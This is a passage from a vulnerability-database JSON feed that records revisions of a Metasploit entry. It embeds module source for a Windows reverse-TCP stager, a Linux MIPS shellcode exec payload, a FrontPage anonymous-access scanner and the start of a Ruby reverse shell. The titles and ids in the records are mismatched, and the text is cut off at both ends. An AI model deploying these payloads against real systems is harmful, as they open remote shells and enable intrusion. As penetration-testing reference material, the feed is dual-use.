"OPENVAS:1361412562310142653", "OPENVAS:1361412562310142655", "OPENVAS:1361412562310142657", "OPENVAS:1361412562310142651"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}], "modified": "2019-07-25T08:29:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T08:29:47", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 15}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "27761625e2013c3793ab37542c842490", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Execute Command", "description": "A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\n", "published": "2014-03-25T08:13:04", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T21:09:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-08-02T21:09:03"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153863", "PACKETSTORM:153864", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T21:09:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/mipsle/exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n\n CachedSize = 52\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Execute Command',\n 'Description' => %q{\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload\n 'entropy@phiral.net' #original payload\n ],\n 'References' =>\n [\n ['EDB', '17940']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE,\n 'Payload' =>\n {\n 'Offsets' => {} ,\n 'Payload' => ''\n })\n )\n register_options(\n [\n OptString.new('CMD', [ true, \"The command string to execute\" ]),\n ])\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n return datastore['CMD'] || ''\n end\n\n def generate\n\n shellcode =\n \"\\x66\\x06\\x06\\x24\" + # li a2,1638\n \"\\xff\\xff\\xd0\\x04\" + # bltzal a2,4100b4\n \"\\xff\\xff\\x06\\x28\" + # slti a2,zero,-1\n \"\\xe0\\xff\\xbd\\x27\" + # addiu sp,sp,-32\n \"\\x01\\x10\\xe4\\x27\" + # addiu a0,ra,4097\n \"\\x1f\\xf0\\x84\\x24\" + # addiu a0,a0,-4065\n \"\\xe8\\xff\\xa4\\xaf\" + # sw a0,-24(sp)\n \"\\xec\\xff\\xa0\\xaf\" + # sw zero,-20(sp)\n \"\\xe8\\xff\\xa5\\x27\" + # addiu a1,sp,-24\n \"\\xab\\x0f\\x02\\x24\" + # li v0,4011\n \"\\x0c\\x01\\x01\\x01\" # syscall 0x40404\n\n #\n # Constructs the payload\n #\n\n shellcode = shellcode + command_string + \"\\x00\"\n\n # we need to align our shellcode to 4 bytes\n (shellcode = shellcode + \"\\x00\") while shellcode.length%4 != 0\n\n return super + shellcode\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T21:09:03", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 16}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T23:16:01", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-08-02T23:16:01"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153864", "PACKETSTORM:153863", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T23:16:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T23:16:01", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 17}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "8ed6993d58c7a1cbc32d1325e51fbf83", "type": "metasploit", "bulletinFamily": "exploit", "title": "FrontPage Server Extensions Anonymous Login Scanner", "description": "This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.\n", "published": "2010-06-21T16:53:52", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://en.wikipedia.org/wiki/Microsoft_FrontPage", "http://msdn2.microsoft.com/en-us/library/ms454298.aspx"], "cvelist": [], "lastseen": "2019-08-12T12:06:49", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 2.2, "vector": "NONE", "modified": "2019-08-12T12:06:49"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935", "CVE-2019-3744"]}, {"type": "kitploit", "idList": ["KITPLOIT:4030290907877314351", "KITPLOIT:2014576974660698399", "KITPLOIT:8472655692165406438"]}, {"type": "thn", "idList": ["THN:D91EA96B102BA7DD88D4AF503A1D6FF1"]}, {"type": "threatpost", "idList": ["THREATPOST:460C81C21FE14019A2DC4247EC2BE34F"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C2E5C3C0350F1BCAB63AA34F6A0BDAF8"]}, {"type": "pentestit", "idList": ["PENTESTIT:2ACE08D4C61B2001FC9ADF11D2E664F2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1840-1"]}, {"type": "mssecure", "idList": ["MSSECURE:D3A43D05FA99A2B0DC1C165936D863A4", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "schneier", "idList": ["SCHNEIER:F626C5B0C5ACFD28C246FE6D819DE037"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815270"]}, {"type": "exploitdb", "idList": ["EDB-ID:47215", "EDB-ID:47217"]}], "modified": "2019-08-12T12:06:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_login.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::WmapScanServer\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n\n def initialize\n super(\n 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner',\n 'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.',\n 'References' =>\n [\n ['URL', 'http://en.wikipedia.org/wiki/Microsoft_FrontPage'],\n ['URL', 'http://msdn2.microsoft.com/en-us/library/ms454298.aspx'],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('UserAgent', [ true, \"The HTTP User-Agent sent in the request\", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ])\n ])\n end\n\n def run_host(target_host)\n\n if datastore['RPORT'].to_i == 80 or datastore['RPORT'].to_i == 443\n port = \"\"\n else\n port = \":\" + datastore['RPORT'].to_s\n end\n\n info = (datastore['SSL'] ? \"https\" : \"http\") + \"://#{target_host}#{port}/\"\n\n connect\n\n sock.put(\"GET /_vti_inf.html HTTP/1.1\\r\\n\" + \"TE: deflate,gzip;q=0.3\\r\\n\" + \"Keep-Alive: 300\\r\\n\" +\n \"Connection: Keep-Alive, TE\\r\\n\" + \"Host: #{vhost}\\r\\n\" + \"User-Agent: \" +\n datastore['UserAgent'] + \"\\r\\n\\r\\n\")\n\n res = sock.get_once || ''\n\n disconnect\n\n if (res.match(/HTTP\\/1.1 200 OK/))\n if (res.match(/Server: (.*)/))\n server_version = $1\n print_status(\"#{info} is running #{server_version}\")\n end\n if (fpversion = res.match(/FPVersion=\"(.*)\"/))\n fpversion = $1\n print_status(\"#{info} FrontPage Version: #{fpversion}\")\n\n if (fpauthor = res.match(/FPAuthorScriptUrl=\"([^\"]*)/))\n fpauthor = $1\n print_status(\"#{info} FrontPage Author: #{info}#{fpauthor}\")\n # Add Report\n opts = {\n :host => target_host,\n :proto => 'tcp',\n :sname => (ssl ? 'https' : 'http'),\n :type => 'FrontPage Author',\n :data => \"#{info}#{fpauthor}\"\n }\n opts[:port] = datastore['RPORT'] if not port.empty?\n report_note(opts)\n end\n check_account(info, fpversion, target_host)\n end\n else\n print_status(\"#{info} may not support FrontPage Server Extensions\")\n end\n end\n\n def check_account(info, fpversion, target_host)\n\n return if not fpversion\n\n connect\n\n # http://msdn2.microsoft.com/en-us/library/ms454298.aspx\n method = \"method=open+service:#{fpversion}&service_name=/\"\n\n req = \"POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\\r\\n\" + \"TE: deflate,gzip;q=0.3\\r\\n\" +\n \"Keep-Alive: 300\\r\\n\" + \"Connection: Keep-Alive, TE\\r\\n\" + \"Host: #{vhost}\\r\\n\" +\n \"User-Agent: \" + datastore['UserAgent'] + \"\\r\\n\" + \"Content-Type: application/x-www-form-urlencoded\\r\\n\" +\n \"X-Vermeer-Content-Type: application/x-www-form-urlencoded\" + \"\\r\\n\" +\n \"Content-Length: #{method.length}\\r\\n\\r\\n\" + method + \"\\r\\n\\r\\n\"\n\n sock.put(req)\n res = sock.get_once\n\n if(res and res.match(/^HTTP\\/1\\.[01]\\s+([^\\s]+)\\s+(.*)/))\n retcode = $1\n retmsg = $2.strip\n\n if(retcode == \"100\")\n ## Sometimes doesn't work !!!!!!!!!!!!!!!\n res = sock.get_once\n if(res and res.match(/^HTTP\\/1\\.[01]\\s+([^\\s]+)\\s+(.*)/))\n retcode = $1\n retmsg = $2.strip\n end\n end\n\n\n case retcode\n when /^200/\n print_good(\"#{info} FrontPage ACCESS ALLOWED [#{retcode}]\")\n # Report a note or vulnerability or something\n # Not really this one, but close\n report_vuln(\n {\n :host => target_host,\n :port\t=> rport,\n :proto\t=> 'tcp',\n :name\t=> self.name,\n :info => \"Module #{self.fullname} confirmed access to #{info} [#{retcode}]\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }\n )\n when /^401/\n print_error(\"#{info} FrontPage Password Protected [#{retcode}]\")\n when /^403/\n print_error(\"#{info} FrontPage Authoring Disabled [#{retcode}]\")\n when /^404/\n print_error(\"#{info} FrontPage Improper Installation [#{retcode}]\")\n when /^500/\n print_error(\"#{info} FrontPage Server Error [#{retcode}]\")\n else\n print_error(\"#{info} FrontPage Unknown Response [#{retcode}]\")\n end\n end\n\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-12T12:06:49", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 18}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-12T14:15:51", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-08-12T14:15:51"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116", "THREATPOST:460C81C21FE14019A2DC4247EC2BE34F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935", "CVE-2019-3744"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995484"]}, {"type": "kitploit", "idList": ["KITPLOIT:4030290907877314351", "KITPLOIT:2014576974660698399"]}, {"type": "thn", "idList": ["THN:D91EA96B102BA7DD88D4AF503A1D6FF1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C2E5C3C0350F1BCAB63AA34F6A0BDAF8"]}, {"type": "pentestit", "idList": ["PENTESTIT:2ACE08D4C61B2001FC9ADF11D2E664F2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142724"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1840-1"]}, {"type": "mssecure", "idList": ["MSSECURE:D3A43D05FA99A2B0DC1C165936D863A4", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "schneier", "idList": ["SCHNEIER:F626C5B0C5ACFD28C246FE6D819DE037"]}], "modified": "2019-08-12T14:15:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-12T14:15:51", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-13T14:57:58", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2019-08-13T14:57:58"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:08DFDF365CEC9A8343CADCDB1558BB52", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995512", "MYHACK58:62201995484"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:2188"]}, {"type": "exploitdb", "idList": ["EDB-ID:47244", "EDB-ID:47243", "EDB-ID:47238", "EDB-ID:47221"]}, {"type": "pentestit", "idList": ["PENTESTIT:E916C1A44B48C516ACEB7CD502F616DE"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8A4460ED43B01CB44E7A22E2A6A7ACB1"]}, {"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154018", "PACKETSTORM:154026"]}], "modified": "2019-08-13T14:57:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-13T14:57:58", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-13T16:20:53", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-13T16:20:53"}, "dependencies": {"references": [{"type": "msrc", "idList": ["MSRC:F6451E22C455ECC6A5002C5C7212F8BE"]}, {"type": "mssecure", "idList": ["MSSECURE:A37B6105F34E3E6038A03DD86999F64F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:08DFDF365CEC9A8343CADCDB1558BB52", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995512", "MYHACK58:62201995484"]}, {"type": "exploitdb", "idList": ["EDB-ID:47243", "EDB-ID:47244", "EDB-ID:47238"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:2188"]}, {"type": "ics", "idList": ["ICSA-19-225-02"]}, {"type": "pentestit", "idList": ["PENTESTIT:E916C1A44B48C516ACEB7CD502F616DE"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8A4460ED43B01CB44E7A22E2A6A7ACB1"]}, {"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935"]}], "modified": "2019-08-13T16:20:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-13T16:20:53", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 21}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "2fa54dd18729ea70e97b459e7358f138", "type": "metasploit", "bulletinFamily": "exploit", "title": "Ruby Command Shell, Reverse TCP SSL", "description": "Connect back and create a command shell via Ruby, uses SSL\n", "published": "2013-02-03T19:59:15", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T09:57:18", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.4, "vector": "NONE", "modified": "2019-08-16T09:57:18"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47278", "EDB-ID:47276", "EDB-ID:47274", "EDB-ID:47279", "EDB-ID:47275", "EDB-ID:47277", "EDB-ID:47273"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1909-1", "OPENSUSE-SU-2019:1897-1", "OPENSUSE-SU-2019:1894-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B266436DCF99567ABAD2E71A57DCE831"]}], "modified": "2019-08-16T09:57:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/ruby'\nrequire 'msf/core/handler/reverse_tcp_ssl'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 444\n\n include Msf::Payload::Single\n include Msf::Payload::Ruby\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Ruby Command Shell, Reverse TCP SSL',\n 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',\n 'Author' => 'RageLtMan',\n 'License' => MSF_LICENSE,\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Handler' => Msf::Handler::ReverseTcpSsl,\n 'Session' => 